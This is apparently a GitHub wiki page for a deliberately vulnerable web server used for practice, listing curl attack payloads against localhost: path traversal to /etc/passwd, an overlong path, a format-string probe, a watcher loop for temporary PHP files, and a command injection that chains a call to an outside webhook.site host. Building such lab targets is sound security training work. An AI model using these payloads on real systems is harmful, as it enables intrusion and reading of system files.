-
Notifications
You must be signed in to change notification settings - Fork 0
Home
Sam Sanoop edited this page May 4, 2025
·
3 revisions
Welcome to the damn-vulnerable-web-server wiki!
curl --path-as-is "http://127.0.0.1:8081/../../../../../../../etc/passwd"
curl --path-as-is "http://127.0.0.1:8081/$(python3 -c 'print("A"*300)')"
example request
curl "http://127.0.0.1:8081/logs?filter=200"
command injection payload
`curl "http://127.0.0.1:8081/logs?filter=foobar%20/tmp/server.log;curl%20https://webhook.site/d5e64a1e-9c6c-4891-ae79-a79e7e9012bd%20&&%20cat"
curl "http://127.0.0.1:8081/echo.php?input=%p%p%p"
curl -i http://127.0.0.1:8081/echo.php`
check /tmp folder to when php file is created, this can be modified
while true; do php_file=$(ls /tmp/php_script_*.php 2>/dev/null); if [ -n "$php_file" ]; then cat "$php_file"; break; fi; sleep 1; done